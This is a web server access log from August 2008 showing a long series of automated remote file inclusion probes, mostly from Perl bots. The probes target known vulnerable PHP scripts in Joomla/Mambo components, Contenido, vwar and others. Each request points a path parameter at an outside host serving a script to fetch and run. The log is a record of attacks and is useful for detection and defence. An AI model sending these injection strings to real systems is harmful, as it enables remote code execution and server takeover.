85.159.91.143 - - [02/Aug/2008:16:40:53 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.17.150.2 - - [02/Aug/2008:16:41:52 +0200] "GET /errors.php?error=http://bolikowski.com/images/tanii?????? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:42:01 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:42:02 +0200] "GET /errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:42:10 +0200] "GET ///vwar/backup/errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
201.130.79.132 - - [02/Aug/2008:16:43:25 +0200] "GET /err-r_log-www.infos.dk%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://myky64.e-il-capo.it/rfi/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
201.130.79.132 - - [02/Aug/2008:16:43:25 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://myky64.e-il-capo.it/rfi/id.txt???? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
217.133.215.166 - - [02/Aug/2008:16:44:04 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:44:31 +0200] "GET /err-r_log-www.infos.dk///vwar/backup/errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:44:31 +0200] "GET ///vwar/backup/errors.php?error=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
195.42.160.22 - - [02/Aug/2008:16:47:49 +0200] "GET /err-r_log-www.infos.dk//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=%20http://www.grupslactancia.info/id.txt??? HTTP/1.0" 302 202 "-" "libwww-perl/5.48"
195.42.160.22 - - [02/Aug/2008:16:47:50 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Bcontenido%5D=%20http://www.grupslactancia.info/id.txt??? HTTP/1.0" 302 202 "-" "libwww-perl/5.48"
80.82.114.37 - - [02/Aug/2008:16:50:14 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
80.82.114.37 - - [02/Aug/2008:16:50:14 +0200] "GET //components/errors.php?error=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
85.214.32.233 - - [02/Aug/2008:16:52:15 +0200] "GET //include/bbs.lib.inc.php?site_path=http://ies-nigeria.com/hezid2.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
83.170.114.48 - - [02/Aug/2008:16:55:12 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://alat.hostingtribe.com/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:55:13 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://alat.hostingtribe.com/safe.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
212.92.23.89 - - [02/Aug/2008:16:58:14 +0200] "GET ///index.php?abg_path=http://www.fieldpaoli.com/images/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:16:58:18 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
75.125.143.162 - - [02/Aug/2008:16:59:09 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:16:59:09 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:16:59:10 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:16:59:10 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:16:59:10 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:16:59:10 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:16:59:28 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
75.125.143.162 - - [02/Aug/2008:17:00:46 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
202.181.105.117 - - [02/Aug/2008:17:05:05 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.magicalrealism.co.uk/id.txt??%0D?? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
202.181.105.117 - - [02/Aug/2008:17:05:05 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.magicalrealism.co.uk/id.txt??%0D?? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
64.22.89.194 - - [02/Aug/2008:17:05:21 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:17:05:21 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
217.172.161.101 - - [02/Aug/2008:17:06:58 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
64.22.89.194 - - [02/Aug/2008:17:07:38 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.89.194 - - [02/Aug/2008:17:07:38 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
62.169.0.50 - - [02/Aug/2008:17:08:04 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
62.169.0.50 - - [02/Aug/2008:17:08:04 +0200] "GET /errors.php?error=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:17:08:47 +0200] "GET /err-r_log-www.infos.dk//include/admin.lib.inc.php?site_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:17:08:48 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
72.232.71.106 - - [02/Aug/2008:17:08:58 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:17:08:58 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:17:09:01 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:17:09:02 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
151.1.210.219 - - [02/Aug/2008:17:09:15 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.17.150.2 - - [02/Aug/2008:17:09:50 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://bolikowski.com/images/tanii?????? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
85.17.150.2 - - [02/Aug/2008:17:09:50 +0200] "GET /errors.php?error=http://bolikowski.com/images/tanii?????? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
64.22.87.132 - - [02/Aug/2008:17:10:17 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
64.22.87.132 - - [02/Aug/2008:17:10:17 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.812"
217.133.215.166 - - [02/Aug/2008:17:10:36 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
217.133.215.166 - - [02/Aug/2008:17:10:37 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
204.15.10.22 - - [02/Aug/2008:17:10:38 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
204.15.10.22 - - [02/Aug/2008:17:10:38 +0200] "GET /errors.php?error=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
72.232.71.106 - - [02/Aug/2008:17:11:37 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
72.232.71.106 - - [02/Aug/2008:17:11:38 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
85.159.91.143 - - [02/Aug/2008:17:11:48 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.159.91.143 - - [02/Aug/2008:17:11:48 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.159.91.143 - - [02/Aug/2008:17:11:49 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
85.159.91.143 - - [02/Aug/2008:17:11:49 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
124.217.242.2 - - [02/Aug/2008:17:12:05 +0200] "GET /err-r_log-www.infos.dk%20%20/errors.php?error=http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
62.169.0.50 - - [02/Aug/2008:17:12:38 +0200] "GET /errors.php?error=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
79.37.216.27 - - [02/Aug/2008:17:12:39 +0200] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
79.37.216.27 - - [02/Aug/2008:17:12:39 +0200] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
219.117.239.114 - - [02/Aug/2008:17:13:50 +0200] "GET //index.php?inc_dir=http://www.desperate-souls.com/raid/docs/idcaca.txt? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
204.15.10.22 - - [02/Aug/2008:17:14:11 +0200] "GET /errors.php?error=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
89.111.172.23 - - [02/Aug/2008:17:14:25 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.219.217.74 - - [02/Aug/2008:17:14:29 +0200] "GET /errors.php?error=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
80.82.114.37 - - [02/Aug/2008:17:16:15 +0200] "GET /err-r_log-www.infos.dk//include/bbs.lib.inc.php?site_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
80.82.114.37 - - [02/Aug/2008:17:16:16 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
83.12.119.178 - - [02/Aug/2008:17:17:19 +0200] "GET /err-r_log-www.infos.dk//include/bbs.lib.inc.php?site_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
80.82.114.37 - - [02/Aug/2008:17:17:20 +0200] "GET //include/bbs.lib.inc.php?site_path=http://www.szurotrade.hu/menv.php/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
83.12.119.178 - - [02/Aug/2008:17:17:37 +0200] "GET //include/bbs.lib.inc.php?site_path=http://albgroup.freeunlimitedweb.com/Jon/rd.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.65"
79.37.216.27 - - [02/Aug/2008:17:18:04 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
79.37.216.27 - - [02/Aug/2008:17:18:05 +0200] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
213.219.217.74 - - [02/Aug/2008:17:20:24 +0200] "GET ///vwar/backup/errors.php?error=http://fpguild.ovh.org/phpraid/log/rid?? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
151.1.210.219 - - [02/Aug/2008:17:21:56 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
217.172.161.101 - - [02/Aug/2008:17:22:33 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
204.15.10.22 - - [02/Aug/2008:17:23:45 +0200] "GET ///vwar/backup/errors.php?error=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
70.84.182.98 - - [02/Aug/2008:17:24:31 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
201.130.79.130 - - [02/Aug/2008:17:24:36 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
62.169.0.50 - - [02/Aug/2008:17:25:08 +0200] "GET ///vwar/backup/errors.php?error=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1"
209.172.55.13 - - [02/Aug/2008:17:25:15 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
70.85.201.66 - - [02/Aug/2008:17:26:31 +0200] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
89.97.0.11 - - [02/Aug/2008:17:27:06 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.97.0.11 - - [02/Aug/2008:17:27:10 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
193.178.228.12 - - [02/Aug/2008:17:27:25 +0200] "GET ///vwar/backup/errors.php?error=http://dantman.com/.../rid???? HTTP/1.1" 302 214 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
89.97.0.11 - - [02/Aug/2008:17:28:26 +0200] "GET //components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
203.146.102.38 - - [02/Aug/2008:17:28:42 +0200] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://manetu.de/cms_demo/contenido/applets/src/.%20/.bash/in.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
83.170.114.48 - - [02/Aug/2008:17:28:50 +0200] "GET /err-r_log-www.infos.dk//includes/header.php?c_temp_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
83.170.114.48 - - [02/Aug/2008:17:28:51 +0200] "GET //includes/header.php?c_temp_path=http://www.cepeduc.com/cepa/images/M.images/idscan3?? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
79.37.216.27 - - [02/Aug/2008:17:29:17 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
79.37.216.27 - - [02/Aug/2008:17:29:18 +0200] "GET /errors.php?error=http://illeganza.altervista.org/id.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
124.217.242.2 - - [02/Aug/2008:17:29:21 +0200] "GET /err-r_log-www.infos.dk%20%20/errors.php?error=http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
64.38.20.210 - - [02/Aug/2008:17:31:37 +0200] "GET /err-r_log-www.infos.dk//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
64.38.20.210 - - [02/Aug/2008:17:31:37 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pne.de//contenido/cronjobs/v6-id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
124.217.242.2 - - [02/Aug/2008:17:38:32 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
116.71.181.73 - - [02/Aug/2008:17:41:53 +0200] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://mauke.globat.com/~pakiboys.org/test? HTTP/1.1" 302 214 "-" "libwww-perl/5.808"
217.172.161.101 - - [02/Aug/2008:17:42:43 +0200] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:17:43:01 +0200] "GET ///vwar/backup/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
209.172.55.13 - - [02/Aug/2008:17:49:47 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.811"
89.111.172.23 - - [02/Aug/2008:17:50:13 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.805"
217.172.161.101 - - [02/Aug/2008:17:55:16 +0200] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
70.84.182.98 - - [02/Aug/2008:17:56:27 +0200] "GET /err-r_log-www.infos.dk//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
70.84.182.98 - - [02/Aug/2008:17:56:27 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
59.188.7.232 - - [02/Aug/2008:17:56:57 +0200] "GET /err-r_log-www.infos.dk//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:17:56:59 +0200] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:17:57:09 +0200] "GET //?path%5Bdocroot%5D=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 200 3425 "-" "libwww-perl/5.803"
89.97.0.11 - - [02/Aug/2008:17:58:09 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.97.0.11 - - [02/Aug/2008:17:58:13 +0200] "GET //include/admin.lib.inc.php?site_path=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
217.172.161.101 - - [02/Aug/2008:17:58:29 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
77.235.44.201 - - [02/Aug/2008:17:58:41 +0200] "GET //?path%5Bdocroot%5D=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 200 3425 "-" "libwww-perl/5.814"
124.217.242.2 - - [02/Aug/2008:18:03:45 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.svkreuzschule-dresden.de/v2/images/save_f3.png?? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
201.130.79.130 - - [02/Aug/2008:18:04:36 +0200] "GET /err-r_log-www.infos.dk//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
201.130.79.130 - - [02/Aug/2008:18:04:37 +0200] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://aaa-hack.fateback.com/id2.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
58.65.228.5 - - [02/Aug/2008:18:05:51 +0200] "GET ///vwar/backup/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
58.65.228.5 - - [02/Aug/2008:18:05:51 +0200] "GET ///vwar/backup/errors.php?error=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.79"
59.188.7.232 - - [02/Aug/2008:18:10:23 +0200] "GET /err-r_log-www.infos.dk/errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
59.188.7.232 - - [02/Aug/2008:18:10:24 +0200] "GET /errors.php?error=http://www.steelselect.com/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.186.1.54 - - [02/Aug/2008:18:10:56 +0200] "GET /err-r_log-www.infos.dk//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
89.186.1.54 - - [02/Aug/2008:18:10:57 +0200] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://neu_2.lasrv-1.de/web/.v6/id.txt??? HTTP/1.1" 302 214 "-" "libwww-perl/5.800"
217.172.161.101 - - [02/Aug/2008:18:12:17 +0200] "GET /err-r_log-www.infos.dk///vwar/backup/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.97.0.11 - - [02/Aug/2008:18:12:44 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.97.0.11 - - [02/Aug/2008:18:12:45 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
89.97.0.11 - - [02/Aug/2008:18:12:45 +0200] "GET /err-r_log-www.infos.dk//components/errors.php?error=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 302 214 "-" "libwww-perl/5.803"
204.15.10.22 - - [02/Aug/2008:18:13:18 +0200] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://dantman.com/.../rid??? HTTP/1.1" 302 214 "-" "libwww-perl/5.810"
